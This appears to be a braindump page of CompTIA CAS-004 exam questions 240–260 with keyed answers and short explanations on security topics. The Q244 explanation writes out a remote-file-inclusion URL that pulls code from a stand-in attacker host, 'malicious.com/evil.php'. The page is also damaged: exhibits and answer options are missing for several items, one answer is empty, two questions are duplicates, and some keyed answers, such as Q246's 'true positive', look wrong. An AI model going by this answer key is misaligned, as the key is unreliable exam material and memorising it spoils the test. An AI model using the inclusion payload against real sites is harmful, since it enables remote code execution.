Download CompTIA CAS-004 Mock Test Study Material [Q240-Q260]

Share

Download CompTIA CAS-004 Mock Test Study Material

CAS-004 Questions Prepare with Learning Information

NEW QUESTION # 240
A security manager is determining the best DLP solution for an enterprise.
A list of requirements was created to use during the source selection.
The security manager wants to confirm a solution exists for the requirements that have been defined.
Which of the following should the security manager use?

  • A. NDA
  • B. RFP
  • C. RFI
  • D. RFQ
  • E. MSA

Answer: C


NEW QUESTION # 241
A security engineer needs to recommend a solution that will meet the following requirements:
Identify sensitive data in the provider's network
Maintain compliance with company and regulatory guidelines
Detect and respond to insider threats, privileged user threats, and compromised accounts Enforce datacentric security, such as encryption, tokenization, and access control Which of the following solutions should the security engineer recommend to address these requirements?

  • A. CASB
  • B. DLP
  • C. SWG
  • D. WAF

Answer: A


NEW QUESTION # 242
A technician uses an old SSL server due to budget constraints and discovers performance degrades dramatically after enabling PFS.
The technician cannot determine why performance degraded so dramatically.
A newer version of the SSL server does not suffer the same performance degradation.
Performance rather than security is the main priority for the technician The system specifications and configuration of each system are listed below:

Which of the following is MOST likely the cause of the degradation in performance and should be changed?

  • A. Memory size
  • B. Connection requests
  • C. Using ECC
  • D. Decryption chips
  • E. Disk size
  • F. Using RSA

Answer: F


NEW QUESTION # 243
A cybersecurity analyst receives a ticket that indicates a potential incident is occurring. There has been a large in log files generated by a generated by a website containing a `'Contact US'' form.
The analyst must determine if the increase in website traffic is due to a recent marketing campaign of if this is a potential incident. Which of the following would BEST assist the analyst?

  • A. Ensuring proper input validation is configured on the `'Contact US'' form
  • B. Checking for new rules from the inbound network IPS vendor
  • C. Running the website log files through a log reduction and analysis tool
  • D. Deploy a WAF in front of the public website

Answer: C


NEW QUESTION # 244
A security engineer notices the company website allows users following example:
hitps://mycompany.com/main.php?Country=US
Which of the following vulnerabilities would MOST likely affect this site?

  • A. Directory traversal -
  • B. Unsecure references
  • C. SQL injection
  • D. Remote file inclusion

Answer: D

Explanation:
Explanation
Remote file inclusion (RFI) is a web vulnerability that allows an attacker to include malicious external files that are later run by the website or web application12. This can lead to code execution, data theft, defacement, or other malicious actions. RFI typically occurs when a web application dynamically references external scripts using user-supplied input without proper validation or sanitization23.
In this case, the website allows users to specify a country parameter in the URL that is used to include a file from another domain. For example, an attacker could craft a URL like this:
https://mycompany.com/main.php?Country=https://malicious.com/evil.php
This would cause the website to include and execute the evil.php file from the malicious domain, which could contain any arbitrary code3.


NEW QUESTION # 245
Company A acquired Company B. During an audit, a security engineer found Company B's environment was inadequately patched. In response, Company A placed a firewall between the two environments until Company B's infrastructure could be integrated into Company A's security program.
Which of the following risk-handling techniques was used?

  • A. Mitigate
  • B. Accept
  • C. Avoid
  • D. Transfer

Answer: A

Explanation:
If you're doing something concrete to handle the risk (like in this case putting up a firewall), then you're attempting to mitigate the risk.


NEW QUESTION # 246
A vulnerability scanner detected an obsolete version of an open-source file-sharing application on one of a company's Linux servers. While the software version is no longer supported by the OSS community, the company's Linux vendor backported fixes, applied them for all current vulnerabilities, and agrees to support the software in the future.
Based on this agreement, this finding is BEST categorized as a:

  • A. false negative.
  • B. true positive.
  • C. false positive.
  • D. true negative.

Answer: B

Explanation:
A true positive is a finding that is confirmed as a valid vulnerability. In this case, the vulnerability was identified and then patched and supported by the Linux vendor, making it a true positive.


NEW QUESTION # 247
A local university that has a global footprint is undertaking a complete overhaul of its website and associated systems Some of the requirements are:
- Handle an increase in customer demand of resources
- Provide quick and easy access to information
- Provide high-quality streaming media
- Create a user-friendly interface
Which of the following actions should be taken FIRST?

  • A. Migrate to a virtualized environment.
  • B. Enhance network access controls.
  • C. Implement a content delivery network.
  • D. Deploy high-availability web servers.

Answer: C


NEW QUESTION # 248
A remote user reports the inability to authenticate to the VPN concentrator.
During troubleshooting, a security administrate captures an attempted authentication and discovers the following being presented by the user's VPN client:

Which of the following BEST describes the reason the user is unable to connect to the VPN service?

  • A. The user's certificate was created using insecure encryption algorithms
  • B. The user's certificate was not created for VPN use
  • C. The user's certificate has been compromised and should be revoked.
  • D. The user's certificate is not signed by the VPN service provider

Answer: C


NEW QUESTION # 249
A company's SOC has received threat intelligence about an active campaign utilizing a specific vulnerability. The company would like to determine whether it is vulnerable to this active campaign. Which of the following should the company use to make this determination?

  • A. A system penetration test
  • B. The Cyber Kill Chain
  • C. Log analysis within the SIEM tool
  • D. Threat hunting

Answer: A

Explanation:
Pen testing tells you how an opponent could get into your environment. It emphasizes the potential damage of not hardening the environment by showing how different vulnerabilities might be exploited or identifying insecure IT practices.
Threat hunting tells you who is already in your environment and what they're up to. It deals with the actual state of the environment and shows what threats are targeting the company.
They're both methods used by defenders to bolster their security, but the former deals with possibly scenarios which may lead to a breach, while the latter works backwards- first looking for a breach, then working backwards to a vulnerability.


NEW QUESTION # 250
An organization's finance system was recently attacked. A forensic analyst is reviewing the contents of the compromised files for credit card dat a. Which of the following commands should the analyst run to BEST determine whether financial data was lost?

  • A. Option A
  • B. Option D
  • C. Option B
  • D. Option C

Answer: D


NEW QUESTION # 251
An organization's finance system was recently attacked. A forensic analyst is reviewing the contents Of the compromised files for credit card data.
Which of the following commands should the analyst run to BEST determine whether financial data was lost?

  • A. Option A
  • B. Option D
  • C. Option B
  • D. Option C

Answer: D


NEW QUESTION # 252
An organization is planning for disaster recovery and continuity of operations.
INSTRUCTIONS
Review the following scenarios and instructions. Match each relevant finding to the affected host.
After associating scenario 3 with the appropriate host(s), click the host to select the appropriate corrective action for that finding.
Each finding may be used more than once.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Answer:

Explanation:


NEW QUESTION # 253
A vulnerability assessment endpoint generated a report of the latest findings.
A security analyst needs to review the report and create a priority list of items that must be addressed.
Which of the following should the analyst use to create the list quickly?

  • A. Business impact rating
  • B. OVAL
  • C. CVE dates
  • D. CVSS scores

Answer: D

Explanation:
CVSS scores (Common Vulnerability Scoring System) should be used to create a priority list of items that must be addressed. The CVSS is a standardized scoring system that is used to assess the severity of vulnerabilities based on a number of factors, including the impact on confidentiality, integrity, and availability, as well as the ease of exploit and the likelihood of an attack. Vulnerabilities are assigned a score on a scale of 0.0 to 10.0, with higher scores indicating a greater level of severity. By reviewing the CVSS scores of the vulnerabilities identified in the report, the security analyst can quickly determine which ones are the most critical and should be addressed first. Other factors, such as the business impact rating and the potential impact on the organization's operations, may also be taken into account when prioritizing patches.


NEW QUESTION # 254
A small company recently developed prototype technology for a military program. The company's security engineer is concerned about potential theft of the newly developed, proprietary information.
Which of the following should the security engineer do to BEST manage the threats proactively?

  • A. Leverage the MITRE ATT&CK framework to map the TTR.
  • B. Update security awareness training to address new threats, such as best practices for data security.
  • C. Join an information-sharing community that is relevant to the company.
  • D. Use OSINT techniques to evaluate and analyze the threats.

Answer: D


NEW QUESTION # 255
A Chief Information Officer (CIO) wants to implement a cloud solution that will satisfy the following requirements:
Support all phases of the SDLC.

Use tailored website portal software.

Allow the company to build and use its own gateway software.

Utilize its own data management platform.

Continue using agent-based security tools.

Which of the following cloud-computing models should the CIO implement?

  • A. MaaS
  • B. SaaS
  • C. IaaS
  • D. PaaS

Answer: D

Explanation:
Because all the requirements want to keep the control of the software.
- Support all phases of the SDLC.
PaaS (manage data, app)
- Use tailored website portal software.
PaaS (manage app)
- Allow the company to build and use its own gateway software.
to build its own gateway "on top".... this is PaaS...the req assumes there's an existing GW but company would rather use theirs
- Utilize its own data management platform.
PaaS (manage application.) u would manage data from an application interface
- Continue using agent-based "security tools" (is an application).
The agent based security tools would be on user devices.


NEW QUESTION # 256
A large industrial system's smart generator monitors the system status and sends alerts to third- party maintenance personnel when critical failures occur. While reviewing the network logs, the company's security manager notices the generator's IP is sending packets to an internal file server's IP. Which of the following mitigations would be BEST for the security manager to implement while maintaining alerting capabilities?

  • A. Containment
  • B. Segmentation
  • C. Firewall whitelisting
  • D. Isolation

Answer: B


NEW QUESTION # 257
A security team received a regulatory notice asking for information regarding collusion and pricing from staff members who are no longer with the organization. The legal department provided the security team with a list of search terms to investigate.
This is an example of:

  • A. legal hold.
  • B. due intelligence
  • C. e-discovery.
  • D. due care.

Answer: C


NEW QUESTION # 258
A PaaS provider deployed a new product using a DevOps methodology.
Because DevOps is used to support both development and production assets inherent separation of duties is limited.
To ensure compliance with security frameworks that require a specific set of controls relating to separation of duties the organization must design and implement an appropriate compensating control.
Which of the following would be MOST suitable in this scenario?

  • A. Configuration of increased levels of logging, monitoring and alerting on production access
  • B. Development of standard code libraries and usage of the WS-security module on all web servers
  • C. Configuration of MFA and context-based login restrictions for all DevOps personnel
  • D. Implementation of peer review, static code analysis and web application penetration testing against the staging environment

Answer: A


NEW QUESTION # 259
A security compliance requirement states that specific environments that handle sensitive data must be protected by need-to-know restrictions and can only connect to authorized endpoints. The requirement also states that a DLP solution within the environment must be used to control the data from leaving the environment.
Which of the following should be implemented for privileged users so they can support the environment from their workstations while remaining compliant?

  • A. A general VPN solution to the primary network
  • B. FIM on the servers storing the data
  • C. NAC to control authorized endpoints
  • D. A jump box in the screened subnet

Answer: C

Explanation:
Network Access Control (NAC) is used to bolster the network security by restricting the availability of network resources to managed endpoints that don't satisfy the compliance requirements of the Organization.


NEW QUESTION # 260
......

Most Reliable CompTIA CAS-004 Training Materials: https://www.exam4tests.com/CAS-004-valid-braindumps.html

Practice Material for CAS-004 Exam Question Preparation: https://drive.google.com/open?id=1sVJmApm-tyOo1sKICNkecWSmjpWBcC0t